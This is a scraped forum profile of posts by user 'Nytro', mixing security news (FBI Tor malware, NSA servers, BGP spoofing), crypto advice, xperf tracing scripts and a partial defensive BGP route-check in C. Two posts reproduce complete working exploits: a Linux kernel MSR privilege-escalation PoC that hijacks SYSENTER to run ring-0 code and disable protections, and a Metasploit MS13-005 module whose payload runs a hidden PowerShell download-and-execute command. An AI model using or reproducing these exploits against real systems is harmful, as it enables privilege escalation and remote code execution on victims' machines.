Nytro - Posts: 18748 - Days Won: 718
Everything posted by Nytro
-
1. RC4 doesn't compare with AES. AVOID RC4! I don't know which is the best, but if for the key exchange (asymmetric) you have a 2048-bit RSA key and for symmetric encryption, AES, you have 256 bits, that should be enough not to worry. I still suggest using elliptic curves (ECDH) for key exchange, and for symmetric encryption, using GCM as the mode of operation for AES.
2. Because the simpler an algorithm is, the easier it is to "break". I can't tell you why, but I take into account the possibility that, if data is intercepted, governments could "break" the encrypted traffic. Theoretically, they use it for compatibility with older browsers too and for faster page loading.
3. If you mean a symmetric encryption algorithm, it's rather useless and very slow, practically there would be no point. In the worst case, 512 bits for the key are enough. Think about how long it would take someone to try 2^512 (2 to the power of 512) combinations for a key...
4. I know there was a contest at NIST for an algorithm to replace SHA. The result, the best algorithm chosen, is Keccak, so yes, SHA3. If you're paranoid, use the 512-bit version, but I don't know if it's really that necessary, because it's a function for computing a hash, so for ensuring data integrity, not for protecting it.
-
At the end I think an exam covering everything would be ok.
-
Win32 Egg Hunter
http://www.youtube.com/watch?v=c630azKzxeM&feature=player_embedded
Description: Detailed Tutorial on Win32 Egg Hunter Implementation.
Ajin Abraham @ajinabraham
Kerala Cyber Force www.keralacyberforce.in
Source: Win32 Egg Hunter
-
Feds Are Suspects in New Malware That Attacks Tor Anonymity
Nytro posted a topic in Stiri securitate
Feds Are Suspects in New Malware That Attacks Tor Anonymity
By Kevin Poulsen 08.05.13 3:57 AM

Security researchers tonight are poring over a piece of malicious software that takes advantage of a Firefox security vulnerability to identify some users of the privacy-protecting Tor anonymity network.

The malware showed up Sunday morning on multiple websites hosted by the anonymous hosting company Freedom Hosting. That would normally be considered a blatantly criminal “drive-by” hack attack, but nobody’s calling in the FBI this time. The FBI is the prime suspect.

“It just sends identifying information to some IP in Reston, Virginia,” says reverse-engineer Vlad Tsyrklevich. “It’s pretty clear that it’s FBI or it’s some other law enforcement agency that’s U.S.-based.”

If Tsyrklevich and other researchers are right, the code is likely the first sample captured in the wild of the FBI’s “computer and internet protocol address verifier,” or CIPAV, the law enforcement spyware first reported by WIRED in 2007.

Court documents and FBI files released under the FOIA have described the CIPAV as software the FBI can deliver through a browser exploit to gather information from the target’s machine and send it to an FBI server in Virginia. The FBI has been using the CIPAV since 2002 against hackers, online sexual predators, extortionists, and others, primarily to identify suspects who are disguising their location using proxy servers or anonymity services, like Tor.

The code has been used sparingly in the past, which kept it from leaking out and being analyzed or added to anti-virus databases.

The broad Freedom Hosting deployment of the malware coincides with the arrest of Eric Eoin Marques in Ireland on Thursday on a U.S. extradition request. The Irish Independent reports that Marques is wanted for distributing child pornography in a federal case filed in Maryland, and quotes an FBI special agent describing Marques as “the largest facilitator of child porn on the planet.”

Freedom Hosting has long been notorious for allowing child porn to live on its servers. In 2011, the hacktivist collective Anonymous singled out Freedom Hosting for denial-of-service attacks after allegedly finding the firm hosted 95 percent of the child porn hidden services on the Tor network.

Freedom Hosting is a provider of turnkey “Tor hidden service” sites — special sites, with addresses ending in .onion — that hide their geographic location behind layers of routing, and can be reached only over the Tor anonymity network. Tor hidden services are ideal for websites that need to evade surveillance or protect users’ privacy to an extraordinary degree – which can include human rights groups and journalists. But it also naturally appeals to serious criminal elements.

Shortly after Marques’ arrest last week, all of the hidden service sites hosted by Freedom Hosting began displaying a “Down for Maintenance” message. That included websites that had nothing to do with child pornography, such as the secure email provider TorMail.

Some visitors looking at the source code of the maintenance page realized that it included a hidden iframe tag that loaded a mysterious clump of Javascript code from a Verizon Business internet address located in Virginia. By midday Sunday, the code was being circulated and dissected all over the net. Mozilla confirmed the code exploits a critical memory management vulnerability in Firefox that was publicly reported on June 25, and is fixed in the latest version of the browser.

Though many older revisions of Firefox are vulnerable to that bug, the malware only targets Firefox 17 ESR, the version of Firefox that forms the basis of the Tor Browser Bundle – the easiest, most user-friendly package for using the Tor anonymity network.

“The malware payload could be trying to exploit potential bugs in Firefox 17 ESR, on which our Tor Browser is based,” the non-profit Tor Project wrote in a blog post Sunday. “We’re investigating these bugs and will fix them if we can.”

The inevitable conclusion is that the malware is designed specifically to attack the Tor browser. The strongest clue that the culprit is the FBI, beyond the circumstantial timing of Marques’ arrest, is that the malware does nothing but identify the target.

The heart of the malicious Javascript is a tiny Windows executable hidden in a variable named “Magneto.” A traditional virus would use that executable to download and install a full-featured backdoor, so the hacker could come in later and steal passwords, enlist the computer in a DDoS botnet, and generally do all the other nasty things that happen to a hacked Windows box.

But the Magneto code doesn’t download anything. It looks up the victim’s MAC address — a unique hardware identifier for the computer’s network or Wi-Fi card — and the victim’s Windows hostname. Then it sends it to the Virginia server, outside of Tor, to expose the user’s real IP address, and coded as a standard HTTP web request.

“The attackers spent a reasonable amount of time writing a reliable exploit, and a fairly customized payload, and it doesn’t allow them to download a backdoor or conduct any secondary activity,” says Tsyrklevich, who reverse-engineered the Magneto code.

The malware also sends, at the same time, a serial number that likely ties the target to his or her visit to the hacked Freedom Hosting-hosted website.

In short, Magneto reads like the x86 machine code embodiment of a carefully crafted court order authorizing an agency to blindly trespass into the personal computers of a large number of people, but for the limited purpose of identifying them.

But plenty of questions remain. For one, now that there’s a sample of the code, will anti-virus companies start detecting it?

Update 8.5.13 12:50: According to Domaintools, the malware’s command-and-control IP address in Virginia is allocated to Science Applications International Corporation. Based in McLean, Virginia, SAIC is a major technology contractor for defense and intelligence agencies, including the FBI. I have a call in to the firm.

13:50: Tor Browser Bundle users who installed or manually updated after June 26 are safe from the exploit, according to the Tor Project’s new security advisory on the hack.

14:30: SAIC has no comment.

15:10: There are incorrect press reports circulating that the command-and-control IP address belongs to the NSA. Those reports are based on a misreading of domain name resolution records. The NSA’s public website, NSA.gov, is served by the same upstream Verizon network as the Tor malware command-and-control server, but that network handles tons of government agencies and contractors in the Washington DC area.

8.6.13 17:10: SAIC’s link to the IP addresses may be an error in Domaintools’ records. The official IP allocation records maintained by the American Registry for Internet Numbers show the two Magneto-related addresses are not part of SAIC’s publicly-listed allocation. They’re part of a ghost block of eight IP addresses that have no organization listed. Those addresses trace no further than the Verizon Business data center in Ashburn, Virginia, 20 miles northwest of the Capital Beltway. (Hat tip: Michael Tigas)

Source: Feds Are Suspects in New Malware That Attacks Tor Anonymity | Threat Level | Wired.com
-
Yes, it's great, a pity it uses MHook, it would have been more 1337 without using it...
-
THE CYBER ESPIONAGE CASE: A server belonging to the NSA is reportedly also located in Romania. MAP of the countries where servers may exist
by Valentin Vidu - Mediafax

The site Cryptome.org has published a list of countries and a world map marked with red dots which it says "could be symbolic locations or could indicate (the existence of) NSA X-Keyscore servers at United States embassies", including in Romania.

According to the site, which does not name a source, although some of the locations where servers are found are known as "NSA-Echelon spy stations within the Five Eyes - United States, Great Britain, Canada, Australia and New Zealand -, many of the server locations are marked in the capitals of these states or near the capitals". The site considers the point in Moscow a "surprise" and notes that another point appears in south-central China, far from Beijing, assessing that it would be a "clandestine server". The site also remarks that the NSA station in Hawaii, where Edward Snowden worked, does not appear on the map.

About 85 points are marked on the map where "approximately 150 sites" would be located, 25 of the points being on the coasts of Antarctica. Red dots also appear in 51 countries. The densest concentration is in Europe, the Middle East, South Asia and Central America, the site observes, stressing that "none appears in areas such as Norway, Sweden, Iceland, Canada, most of South America, the Pacific and the Atlantic islands".

Cryptome.org considers that "it would be logical for the American National Security Agency (NSA) to use American embassies as outposts for collecting local communications (data) with the help of X-Keyscore", noting that embassies have been used for "the entire spectrum of espionage in all its forms and disguises, military, political, economic, social" and concluding that "adding the cyber aspect was inevitable". The site argues that embassies hold multiple communication networks, from the lowest security levels to the highest. The same source adds that other new disclosures of documents originating from Edward Snowden could describe how this is achieved by personnel, networks and the architecture of data servers, not just through the PRISM and X-Keyscore programs.

Cryptome.org is a digital hosting library, created in 1996 by independent American researchers and architects John Young and Deborah Natsios. The library functions as a repository for information about freedom of expression, cryptography, espionage and surveillance. Cryptome states as its mission, on its site, "to receive for publication documents that are banned by governments around the world, in particular material on freedom of expression, privacy, cryptology, dual-use technologies, national security, intelligence and secret governance - declassified, secret and classified documents - but is not limited to these".

Source: THE CYBER ESPIONAGE CASE: A server belonging to the NSA is reportedly also located in Romania. MAP of the countries where servers may exist - Mediafax
-
Yes, it stays at 17, but it includes the necessary patches: https://blog.torproject.org/blog/tor-security-advisory-old-tor-browser-bundles-vulnerable
-
Yes. Those of you who don't have Firefox 22 yet had better update. And it's a good example to contradict "Firefox is safer than IE". Well, use Chrome.
-
[h=1]Linux Kernel 'MSR' Driver Local Privilege Escalation[/h]

// PoC exploit for /dev/cpu/*/msr, 32bit userland on a 64bit host
// can do whatever in the commented area, re-enable module support, etc
// requires CONFIG_X86_MSR and just uid 0
// a small race exists between the time when the MSR is written to the first
// time and when we issue our sysenter
// we additionally require CAP_SYS_NICE to make the race win nearly guaranteed
// configured to take a hex arg of a dword pointer to set to 0
// (modules_disabled, selinux_enforcing, take your pick)
//
// Hello to Red Hat, who has shown yet again to not care until a
// public exploit is released. Not even a bugtraq entry existed in
// their system until this was published -- and they have a paid team
// of how many?
// It's not as if I didn't mention the problem and existence of an easy
// exploit multiple times prior:
//
//
//
//
//
//
//
//
// spender 2013

#define _GNU_SOURCE
#include <stdio.h>
#include <sched.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/mman.h>

#define SYSENTER_EIP_MSR 0x176

u_int64_t msr;
unsigned long ourstack[65536];
u_int64_t payload_data[16];

extern void *_ring0;
extern void *_ring0_end;

void ring0(void)
{
	__asm volatile(
	".globl _ring0\n"
	"_ring0:\n"
	".intel_syntax noprefix\n"
	".code64\n"
	// set up stack pointer with 'ourstack'
	"mov esp, ecx\n"
	// save registers, contains the original MSR value
	"push rax\n"
	"push rbx\n"
	"push rcx\n"
	"push rdx\n"
	// play with the kernel here with interrupts disabled!
	"mov rcx, qword ptr [rbx+8]\n"
	"test rcx, rcx\n"
	"jz skip_write\n"
	"mov dword ptr [rcx], 0\n"
	"skip_write:\n"
	// restore MSR value before returning
	"mov ecx, 0x176\n" // SYSENTER_EIP_MSR
	"mov eax, dword ptr [rbx]\n"
	"mov edx, dword ptr [rbx+4]\n"
	"wrmsr\n"
	"pop rdx\n"
	"pop rcx\n"
	"pop rbx\n"
	"pop rax\n"
	"sti\n"
	"sysexit\n"
	".code32\n"
	".att_syntax prefix\n"
	".global _ring0_end\n"
	"_ring0_end:\n"
	);
}

unsigned long saved_stack;

int main(int argc, char *argv[])
{
	cpu_set_t set;
	int msr_fd;
	int ret;
	u_int64_t new_msr;
	struct sched_param sched;
	u_int64_t resolved_addr = 0ULL;

	if (argc == 2)
		resolved_addr = strtoull(argv[1], NULL, 16);

	/* can do this without privilege */
	mlock(_ring0, (unsigned long)_ring0_end - (unsigned long)_ring0);
	mlock(&payload_data, sizeof(payload_data));

	CPU_ZERO(&set);
	CPU_SET(0, &set);

	sched.sched_priority = 99;
	ret = sched_setscheduler(0, SCHED_FIFO, &sched);
	if (ret) {
		fprintf(stderr, "Unable to set priority.\n");
		exit(1);
	}
	ret = sched_setaffinity(0, sizeof(cpu_set_t), &set);
	if (ret) {
		fprintf(stderr, "Unable to set affinity.\n");
		exit(1);
	}

	msr_fd = open("/dev/cpu/0/msr", O_RDWR);
	if (msr_fd < 0) {
		msr_fd = open("/dev/msr0", O_RDWR);
		if (msr_fd < 0) {
			fprintf(stderr, "Unable to open /dev/cpu/0/msr\n");
			exit(1);
		}
	}

	lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
	ret = read(msr_fd, &msr, sizeof(msr));
	if (ret != sizeof(msr)) {
		fprintf(stderr, "Unable to read /dev/cpu/0/msr\n");
		exit(1);
	}

	// stuff some addresses in a buffer whose address we
	// pass to the "kernel" via register
	payload_data[0] = msr;
	payload_data[1] = resolved_addr;

	printf("Old SYSENTER_EIP_MSR = %016llx\n", msr);
	fflush(stdout);

	lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
	new_msr = (u_int64_t)(unsigned long)&_ring0;
	printf("New SYSENTER_EIP_MSR = %016llx\n", new_msr);
	fflush(stdout);

	ret = write(msr_fd, &new_msr, sizeof(new_msr));
	if (ret != sizeof(new_msr)) {
		fprintf(stderr, "Unable to modify /dev/cpu/0/msr\n");
		exit(1);
	}

	__asm volatile(
	".intel_syntax noprefix\n"
	".code32\n"
	"mov saved_stack, esp\n"
	"lea ecx, ourstack\n"
	"lea edx, label2\n"
	"lea ebx, payload_data\n"
	"sysenter\n"
	"label2:\n"
	"mov esp, saved_stack\n"
	".att_syntax prefix\n"
	);

	printf("Success.\n");
	return 0;
}

Source: Linux Kernel 'MSR' Driver Local Privilege Escalation
-
[h=1]MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation[/h]

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/exploit/exe'

class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::Powershell
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::FileDropper
  include Msf::Post::File

  def initialize(info={})
    super( update_info( info,
      'Name'          => 'MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation',
      'Description'   => %q{
        The Windows kernel does not properly isolate broadcast messages from low integrity
        applications from medium or high integrity applications. This allows commands to be
        broadcasted to an open medium or high integrity command prompts allowing escalation of
        privileges. We can spawn a medium integrity command prompt, after spawning a low integrity
        command prompt, by using the Win+Shift+# combination to specify the position of the command
        prompt on the taskbar. We can then broadcast our command and hope that the user is away and
        doesn't corrupt it by interacting with the UI. Broadcast issue affects versions Windows Vista,
        7, 8, Server 2008, Server 2008 R2, Server 2012, RT. But Spawning a command prompt with the
        shortcut key does not work in Vista so you will have to check if the user is already running
        a command prompt and set SPAWN_PROMPT false. The WEB technique will execute a powershell
        encoded payload from a Web location. The FILE technique will drop an executable to the file
        system, set it to medium integrity and execute it. The TYPE technique will attempt to execute
        a powershell encoded payload directly from the command line but it may take some time to
        complete.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Tavis Ormandy', # Discovery
          'Axel Souchet', # @0vercl0k POC
          'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit module
        ],
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ],
      'Targets'       =>
        [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate'=> "Nov 27 2012",
      'References'    =>
        [
          [ 'CVE', '2013-0008' ],
          [ 'MSB', 'MS13-005' ],
          [ 'OSVDB', '88966'],
          [ 'URL', 'http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html' ]
        ]
    ))

    register_options(
      [
        OptBool.new('SPAWN_PROMPT', [true, 'Attempts to spawn a medium integrity command prompt', true]),
        OptEnum.new('TECHNIQUE', [true, 'Delivery technique', 'WEB', ['WEB','FILE','TYPE']]),
        OptString.new('CUSTOM_COMMAND', [false, 'Custom command to type'])
      ], self.class
    )
  end

  def low_integrity_level?
    tmp_dir = expand_path("%USERPROFILE%")
    cd(tmp_dir)
    new_dir = "#{rand_text_alpha(5)}"

    begin
      session.shell_command_token("mkdir #{new_dir}")
    rescue
      return true
    end

    if directory?(new_dir)
      session.shell_command_token("rmdir #{new_dir}")
      return false
    else
      return true
    end
  end

  def win_shift(number)
    vk = 0x30 + number
    bscan = 0x81 + number
    client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 0, 0)
    client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 0, 0)
    client.railgun.user32.keybd_event(vk, bscan, 0, 0)
    client.railgun.user32.keybd_event(vk, bscan, 'KEYEVENTF_KEYUP', 0)
    client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 'KEYEVENTF_KEYUP', 0)
    client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 'KEYEVENTF_KEYUP', 0)
  end

  def count_cmd_procs
    count = 0
    client.sys.process.each_process do |proc|
      if proc['name'] == 'cmd.exe'
        count += 1
      end
    end

    vprint_status("Cmd prompt count: #{count}")
    return count
  end

  def cleanup
    if datastore['SPAWN_PROMPT'] and @hwin
      vprint_status("Rehiding window...")
      client.railgun.user32.ShowWindow(@hwin, 0)
    end
    super
  end

  def exploit
    # First of all check if the session is running on Low Integrity Level.
    # If it isn't doesn't worth continue
    print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
    fail_with(Exploit::Failure::NotVulnerable, "Not running at Low Integrity!") unless low_integrity_level?

    # If the user prefers to drop payload to FILESYSTEM, try to cd to %TEMP% which
    # hopefully will be "%TEMP%/Low" (IE Low Integrity Process case) where a low
    # integrity process can write.
    drop_to_fs = false
    if datastore['TECHNIQUE'] == 'FILE'
      payload_file = "#{rand_text_alpha(5+rand(3))}.exe"
      begin
        tmp_dir = expand_path("%TEMP%")
        tmp_dir << "\\Low" unless tmp_dir[-3,3] =~ /Low/i
        cd(tmp_dir)
        print_status("Trying to drop payload to #{tmp_dir}...")
        if write_file(payload_file, generate_payload_exe)
          print_good("Payload dropped successfully, exploiting...")
          drop_to_fs = true
          register_file_for_cleanup(payload_file)
          payload_path = tmp_dir
        else
          print_error("Failed to drop payload to File System, will try to execute the payload from PowerShell, which requires HTTP access.")
          drop_to_fs = false
        end
      rescue ::Rex::Post::Meterpreter::RequestError
        print_error("Failed to drop payload to File System, will try to execute the payload from PowerShell, which requires HTTP access.")
        drop_to_fs = false
      end
    end

    if drop_to_fs
      command = "cd #{payload_path} && icacls #{payload_file} /setintegritylevel medium && #{payload_file}"
      make_it(command)
    elsif datastore['TECHNIQUE'] == 'TYPE'
      if datastore['CUSTOM_COMMAND']
        command = datastore['CUSTOM_COMMAND']
      else
        print_warning("WARNING: It can take a LONG TIME to broadcast the cmd script to execute the psh payload")
        command = cmd_psh_payload(payload.encoded)
      end
      make_it(command)
    else
      super
    end
  end

  def primer
    url = get_uri()
    download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
    command = "powershell.exe -w hidden -nop -ep bypass -c #{download_and_run}"
    make_it(command)
  end

  def make_it(command)
    if datastore['SPAWN_PROMPT']
      @hwin = client.railgun.kernel32.GetConsoleWindow()['return']
      if @hwin == nil
        @hwin = client.railgun.user32.GetForegroundWindow()['return']
      end
      client.railgun.user32.ShowWindow(@hwin, 0)
      client.railgun.user32.ShowWindow(@hwin, 5)

      # Spawn low integrity cmd.exe
      print_status("Spawning Low Integrity Cmd Prompt")
      windir = client.fs.file.expand_path("%windir%")
      li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid

      count = count_cmd_procs
      spawned = false
      print_status("Bruteforcing Taskbar Position")
      9.downto(1) do |number|
        vprint_status("Attempting Win+Shift+#{number}")
        win_shift(number)
        sleep(1)
        if count_cmd_procs > count
          print_good("Spawned Medium Integrity Cmd Prompt")
          spawned = true
          break
        end
      end

      client.sys.process.kill(li_cmd_pid)
      fail_with(Exploit::Failure::Unknown, "No Cmd Prompt spawned") unless spawned
    end

    print_status("Broadcasting payload command to prompt... I hope the user is asleep!")
    command.each_char do |c|
      print c if command.length < 200
      client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0)
    end
    print_line
    print_status("Executing command...")
    client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', 'VK_RETURN', 0)
  end

  def on_request_uri(cli, request)
    print_status("Delivering Payload")
    data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
    send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
  end

end

Source: MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation
-
[h=1]Defrag Tools: #50 - WPT - Memory Analysis - Heap[/h]
Posted: 14 hours ago By: Larry Larsen, Andrew Richards, Chad Beeder

In this episode of Defrag Tools, Andrew Richards, Chad Beeder and Larry Larsen continue walking you through the Windows Performance Toolkit (WPT). This is part 3 of 3 episodes on memory usage/leaks. Example xPerf scripts.

Resources: Aaron Margosis VirtMemTest

Timeline:
[00:00] - 50th Episode of Defrag Tools!
[01:20] - Attach: xperf -start HeapSession -heap -pids %1 -stackwalk ...
[03:28] - VirtMemTest
[04:54] - WPA
[06:22] - Type - Allocated Inside (AI) & Outside (AO), Freed Inside (FI) & Outside (FO)
[07:20] - Launch: Image File Execution Options
[07:51] - Launch: xperf -start HeapSession -heap -pids 0 -stackwalk ...
[08:40] - Registry Editor - IFEO
[10:26] - WPA
[11:06] - Type - Allocated Inside (AI) & Outside (AO), Freed Inside (FI) & Outside (FO)
[11:25] - Summary - AIFO

Example: "xperf - Collect Heap_Attach.cmd"

@echo off
echo Press a key when ready to start...
pause
echo .
echo ...Capturing...
echo .
xperf -on PROC_THREAD+LOADER+VIRT_ALLOC -stackwalk VirtualAlloc+VirtualFree -BufferSize 1024 -MinBuffers 256 -MaxBuffers 256 -MaxFile 256 -FileMode Circular
xperf -start HeapSession -heap -pids %1 -stackwalk HeapAlloc+HeapRealloc -BufferSize 1024 -MinBuffers 256 -MaxBuffers 256 -MaxFile 256 -FileMode Circular
echo Press a key when you want to stop...
pause
echo .
echo ...Stopping...
echo .
xperf -stop -stop HeapSession -d heap.etl

Example: "xperf - Collect Heap_Launch.cmd"

@echo off
echo Press a key when ready to start...
pause
echo .
echo ...Capturing...
echo .
rem Add the process to IFEO
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%1.exe" /v TracingFlags /t REG_DWORD /d 1 /f
xperf -on PROC_THREAD+LOADER+VIRT_ALLOC -BufferSize 1024 -MinBuffers 256 -MaxBuffers 256 -stackwalk VirtualAlloc
xperf -start HeapSession -heap -pids 0 -stackwalk HeapAlloc+HeapRealloc -BufferSize 1024 -MinBuffers 256 -MaxBuffers 256 -MaxFile 256 -FileMode Circular
echo Press a key when you want to stop...
pause
echo .
echo ...Stopping...
echo .
xperf -stop HeapSession -stop -d heap.etl
rem Remove the process from IFEO
reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%1.exe" /v TracingFlags /f

Source: Defrag Tools: #50 - WPT - Memory Analysis - Heap | Defrag Tools | Channel 9
-
BGP spoofing - why nothing on the internet is actually secure Summary: A skilled attacker with access to the right router can co-opt routes to destination IP address. When this happens, nothing on the internet is trustworthy. And there's no way to stop it. By Larry Seltzer for Zero Day | August 6, 2013 -- 04:00 GMT (21:00 PDT) The scariest hack of them all on the internet has been around for a long time, but it doesn't get a lot of attention in the broader tech press. It's BGP spoofing and it compromises the most basic functions of the internet: the routing of data from one system to another. Effective use of BGP spoofing is not within the reach of script kiddies, but there's a lot of it going on. How much? Nobody knows and nobody can know. It's possible to detect that an attack is going on, but it's impossible to prevent it and it may be difficult to stop an attack in progress. I spoke with Dave Rand, Technical Fellow at Trend Micro. Back in the mid-90's Rand worked at an ISP and first encountered BGP spoofing used to facilitate spamming. The routing in the mail headers of the spam looked particularly genuine because all the addresses were correct. At the bottom of it was a compromised router at an ISP. I've spoken to Dave many times over the years about BGP spoofing. He's always considered it a very serious problem that is fundamentally insolvable and I'd like to thank him for all the information below. How is all this possible? It starts with the very basics of how the internet works. The internet is a network of networks. Routers are used to move data between networks according to IP addresses that are stored in their routing tables. Routers will advertise to each other that they use certain addresses. But — and this is very important — there is no authority to check to confirm that a particular address belongs to a particular network. 
There are organizations, such as RIPE in Europe and ARIN for the US and Canada, which allocate IP addresses (all they have left is IPv6 addresses), but there's nowhere you can check to confirm an allocation authoritatively. Because of this, the updating of routing tables is done entirely on trust.

Consider this simplistic example: ISP1 has the address space 1.0.0.0/8 and ISP2 has 2.0.0.0/8. They each advertise their space to the other. Now ISP3 advertises 3.0.0.0/8 to ISP1 and asks ISP1 to advertise its addresses, which it does. ISP1 becomes a transit provider for ISP3, a service for which ISP3 pays ISP1. But ISP1 has no real way to confirm that ISP3's advertisements are accurate. Here's another important point: shorter routes get higher priority from the router. If ISP3 were to advertise a small subset of addresses to ISP1 with shorter paths than what ISP1 already had, ISP1 would follow those routes instead of what was already in the routing table.

It's important to note that in order to execute this attack you need control of an ISP router. You might think that this would be hard to do, and it's harder than it used to be, but it's not impossible. It's still possible to find routers with default admin passwords or passwords on a common dictionary list. And once you do and take control, there's nothing to stop you from advertising Bank of America addresses on your network.

I suspect that the large majority of erroneous advertisements are, well, erroneous. They're not malicious, they're just screwups. There was a recent incident where some bad routes in NedZone Internet BV's network included Amazon.com and a bunch of big banks. It looks way too brazen to be an attack. If you really wanted to be effective and surreptitious with such an attack you'd be lower-profile. You'd attack the router of a small or mid-size ISP and you'd only advertise it for a short time, but during that time you'd have other attacks, like cross-site scripting and targeted spam, ongoing against that ISP's users. When they attempt to communicate with their bank or retailer they will instead go to your servers; you can spoof those servers, see the cookies, it all depends on how ornate you want to get, but all you really need is to get users to log on to the site, which can satisfy SSL and get the little lock icon because the attacker can control those addresses too. Once you have validated logins for those accounts you can sell them for a lot.

Sometimes malicious attacks are not for profit, but just network vandalism. In 2008 there was a dispute between YouTube and the government of Pakistan about certain content. Sometime later false BGP routes pointed YouTube traffic in much of Europe to Pakistan Telecom, stealing traffic from YouTube but also flooding Pakistan Telecom with all of YouTube's traffic. RIPE, the regional internet registry for Europe, has .

After an attack like this there may be no footprints left. Nobody logs router advertisements. There are groups that log and analyze the global routing table, such as the fascinating CIDR Report, and look for routes that don't make sense. But these only catch changes that propagate out to the global routing table. A transient advertisement which only goes to an ISP's peer and not a transit provider won't get to the global table. And even if it does, by the time anyone can see what's going on it will be too late.

It's impossible to block BGP spoofing attacks in a consistent, automated fashion, but it is possible to apply some common sense and experience, what you might call heuristics, to determine that a route isn't kosher. If a small ISP in Brazil starts advertising routes to PayPal then an experienced CNE might think twice about replicating it. But these things don't usually get vetted by a human being; there's too much going on. All ISPs advertise their routes to the other networks to which they connect and these companies (there are 30 or 40 thousand ISPs now) have a relationship and contracts, so they trust each other. And if they wanted to check the addresses they couldn't; there's no authoritative place to check.

You might complain that best administration practices, such as good route filtering, would prevent these attacks, and there's something to that. You can certainly prevent a lot of them with best practices. There are other practices that can make it harder to exploit such attacks successfully, such as using strong encryption and authentication for all local traffic, but there's no technique that will block these attacks in all cases.

If you find out that an ISP has bogus routes to your network what can you do? All you can do is call them and ask them (nicely or otherwise) to withdraw the route, but you can't make them. If they don't respond adequately you can complain to their upstream providers and ask them to block the route, but once again there is no official mechanism for doing this because there is no authority in charge of it, and you probably don't even have a relationship with the ISP to which you're complaining.

Of all the attacks happening under the radar on the internet, the most dangerous ones are likely based on BGP spoofing. It's the best reason to assume that a lot more network compromising, by criminal and government actors, is happening than is officially acknowledged, and even the officials don't really know how much is happening. What can be done? If Dave Rand doesn't know then I sure don't.

Source: BGP spoofing - why nothing on the internet is actually secure | ZDNet
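As an added example (not part of the ZDNet article above), here is the kind of origin check the article calls a heuristic, written in C: every received announcement is compared against a table of who is expected to originate a block of address space and how finely that block may be split, which is how RPKI route origin validation and IRR-based filters work today. The table and the announcements are constructed; the prefixes reuse the article's ISP1/ISP2/ISP3 example, and the AS numbers 64501-64503 are from the documentation range. An announcement for space that is not on file at all (ISP3's 3.0.0.0/8) comes back UNKNOWN, which is exactly the article's point that such routes are accepted on trust.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Result of checking one announcement against the expected-origin table. */
enum route_status {
    ROUTE_VALID,        /* expected holder, within the allowed prefix length */
    ROUTE_UNKNOWN,      /* nothing on file for this space: trust is all we have */
    ROUTE_BAD_ORIGIN,   /* space is on file, but announced by a different AS */
    ROUTE_TOO_SPECIFIC, /* right origin, but de-aggregated beyond what is allowed */
    ROUTE_MALFORMED     /* prefix string could not be parsed */
};

/* Who is expected to originate a block and how finely it may be split.
   Constructed table standing in for RPKI ROAs or IRR route objects; the
   prefixes follow the article's ISP1/ISP2 example and the AS numbers are
   taken from the documentation range (64496-64511). */
struct expected_origin {
    const char *prefix;
    int max_len;
    uint32_t origin_as;
};

static const struct expected_origin expected[] = {
    {"1.0.0.0/8", 8, 64501}, /* ISP1 */
    {"2.0.0.0/8", 8, 64502}, /* ISP2 */
};
#define N_EXPECTED (sizeof expected / sizeof expected[0])

static uint32_t prefix_mask(int len)
{
    return len == 0 ? 0u : 0xFFFFFFFFu << (32 - len);
}

/* Parse "a.b.c.d/len" into a masked network number and a prefix length. */
static int parse_prefix(const char *s, uint32_t *net, int *len)
{
    unsigned a, b, c, d;
    int l;
    if (sscanf(s, "%u.%u.%u.%u/%d", &a, &b, &c, &d, &l) != 5)
        return -1;
    if (a > 255 || b > 255 || c > 255 || d > 255 || l < 0 || l > 32)
        return -1;
    *net = (((uint32_t)a << 24) | ((uint32_t)b << 16) | ((uint32_t)c << 8) | (uint32_t)d)
           & prefix_mask(l);
    *len = l;
    return 0;
}

/* Check one announcement: the prefix and the origin AS (last hop of the AS path). */
enum route_status check_announcement(const char *prefix, uint32_t origin_as)
{
    uint32_t net;
    int len, covered = 0, origin_ok = 0;
    if (parse_prefix(prefix, &net, &len) != 0)
        return ROUTE_MALFORMED;

    for (size_t i = 0; i < N_EXPECTED; i++) {
        uint32_t enet;
        int elen;
        if (parse_prefix(expected[i].prefix, &enet, &elen) != 0)
            continue;
        /* An entry covers the announcement if it is the same or a less specific block. */
        if (len < elen || ((net ^ enet) & prefix_mask(elen)) != 0)
            continue;
        covered = 1;
        if (expected[i].origin_as != origin_as)
            continue;
        origin_ok = 1;
        if (len <= expected[i].max_len)
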